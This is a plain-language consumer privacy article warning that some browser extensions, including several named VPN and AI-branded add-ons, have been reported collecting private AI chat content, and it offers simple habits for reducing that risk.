Browser Extensions Can Expose Your Private AI Chats

Browser extensions can be incredibly useful. They block ads, improve productivity, add AI features, and promise better privacy. But new research shows that some extensions can quietly access and sell your private AI conversations, including chats with tools like ChatGPT and Google Gemini.

Security researchers and journalists have found that certain third-party browser extensions were collecting AI chat content and sending it to outside servers, where it could be used for marketing, analytics, or other commercial purposes (Forbes).

In simple terms: what you thought was a private AI conversation may not have been private at all.


Why This Matters to Everyday Users

Many people use AI tools for normal, everyday tasks, such as:

  • Writing emails or resumes
  • Planning trips or budgets
  • Asking health or personal questions
  • Brainstorming business or school ideas

If a browser extension has permission to “read and change data on websites,” it may also be able to see everything typed into AI chat windows, including questions and responses. That means personal, sensitive, or confidential information can be exposed without users realizing it (1Password Blog).

You don’t need technical knowledge or do anything risky for this to happen. In some cases, extensions were legitimate at first but later changed after new versions or developer accounts got compromised.


Browser Extensions That Have Been Flagged as Risky

Cybersecurity researchers have publicly identified multiple extensions that were compromised or caught collecting user data in unsafe ways. Some were removed or updated after discovery, but users who installed them earlier may have already been affected.

Examples of confirmed or reported risky extensions include:

  • Urban VPN (and related variants), which researchers found harvesting browsing and AI data and sending it to remote servers (The Hacker News)
  • FreeVPN.One, which was reported to be capturing screenshots of user activity across websites (Tom’s Hardware)
  • Bard AI Chat (third-party extension, not Google’s official tool), identified in compromised extension campaigns (Malwarebytes)
  • ChatGPT for Google Meet, ChatGPT App, and ChatGPT Quick Access, which were included in large-scale extension hijacking attacks (Malwarebytes: same link as above)
  • VPNCity and Internxt VPN, also listed among extensions affected by malicious update campaigns (Malwarebytes: same link as above)

It’s important to note that not all users installed these extensions knowing they were unsafe, and in many cases, the problems appeared only after later updates.


How to Protect Yourself (No Technical Skills Needed)

You can reduce your risk with a few simple habits:

  • Remove extensions you don’t actively use
    If you haven’t used it in weeks, you probably don’t need it.
  • Be cautious with AI-branded extensions
    Many unofficial tools use popular names to appear trustworthy.
  • Check permissions before installing
    Avoid extensions that ask for full access to all websites unless absolutely necessary.
  • Stick to official tools when possible
    Built-in browser features and official integrations are generally safer than third-party add-ons.
  • Review extensions after updates
    An extension can change behavior over time without obvious warnings.

Final Takeaway

Browser extensions are among the easiest ways for personal data to leak online – not through hacking, but through silent access that users unknowingly grant. As AI tools become part of daily life, protecting your privacy means paying closer attention to what has access to your browser.

Privacy usually isn’t lost in one big moment.
It’s lost quietly – one extension at a time.

Scroll to Top